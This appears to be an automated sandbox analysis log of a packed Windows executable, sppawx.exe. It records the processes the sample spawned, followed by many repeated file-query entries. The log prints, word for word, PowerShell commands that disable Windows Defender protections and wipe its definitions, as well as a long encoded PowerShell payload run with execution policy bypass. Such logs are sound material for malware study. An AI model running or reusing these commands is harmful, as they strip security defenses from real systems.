Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe

Code function: 103_2_00007FF6256FB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

103_2_00007FF6256FB340

Source: C:\Users\user\Desktop\sppawx.exe

Code function: 0_2_00007FF79A3395E0 cpuid

0_2_00007FF79A3395E0

Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\blank.aes VolumeInformation	Jump to behavior
